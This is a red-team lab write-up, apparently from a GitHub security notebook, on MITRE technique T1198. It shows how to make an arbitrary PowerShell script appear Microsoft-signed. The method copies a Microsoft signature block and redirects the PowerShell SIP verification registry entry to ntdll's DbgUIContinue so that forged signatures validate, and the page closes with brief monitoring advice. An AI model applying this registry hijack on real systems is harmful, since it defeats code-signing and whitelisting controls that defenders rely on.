Skip to content

Latest commit

 

History

History
97 lines (57 loc) · 3.2 KB

t1198-trust-provider-hijacking.md

File metadata and controls

97 lines (57 loc) · 3.2 KB
description
Defense Evasion, Persistence, Whitelisting Bypass

T1198: SIP & Trust Provider Hijacking

In this lab, I will try to sign a simple "rogue" powershell script test-forged.ps1 that only has one line of code, with Microsoft's certificate and bypass any whitelisting protections/policies the script may be subject to if it is not signed.

Execution

The script that I will try to sign:

Just before I start, let's make sure that the script is not signed by using a Get-AuthenticodeSignature cmdlet and sigcheck by SysInternals:

In order to sign the script with Microsoft's certificate, we need to first find a native Microsoft Signed PowerShell script. I used powershell for this:

Get-ChildItem -Path C:\*.ps* -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "# SIG # Begin signature block"

I chose one script at random and simply checked if it was signed - luckily it was:

type C:\Windows\WinSxS\x86_microsoft-windows-m..ell-cmdlets-modules_31bf3856ad364e35_10.0.16299.15_none_c7c20f51cd336675\Wdac.psd1

Let's copy the Microsoft signature block to my script:

Now let's modify registry at:

HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}

From:

To:

{% code title="DLL" %}

C:\Windows\System32\ntdll.dll

{% endcode %}

{% code title="FuncName" %}

DbgUIContinue

{% endcode %}

Now, let's launch a new powershell instance (for the registry changes to take effect) and check the signature of the forged script - note how it now shows as signed, verified and valid:

Observations

Monitoring the following registry keys/values helps discover this suspicious activity:

References

For all the registry keys/values that should be used as a baseline, please refer to the original research whitepaper by Matt Graeber:
SpecterOps Subverting Trust inWindows

{% embed url="https://attack.mitre.org/wiki/Technique/T1198" %}

{% embed url="https://www.youtube.com/watch?v=wxmxxgL6Nz8" %}

{% embed url="https://pentestlab.blog/2017/11/06/hijacking-digital-signatures/" %}

{% embed url="http://ultimate-sysadmin-fanboy.blogspot.com/2015/06/unable-to-renew-certificate-via.html" %}

{% embed url="https://blogs.msdn.microsoft.com/sqlforum/2011/01/02/walkthrough-request-a-digital-certificate-from-certificate-server-or-create-a-testing-digital-certificate-to-sign-a-package/" %}

{% embed url="https://www.youtube.com/watch?v=WrHTJQovDoY" %}

{% embed url="https://www.hanselman.com/blog/SigningPowerShellScripts.aspx" %}

{% embed url="https://github.com/netbiosX/Digital-Signature-Hijack" %}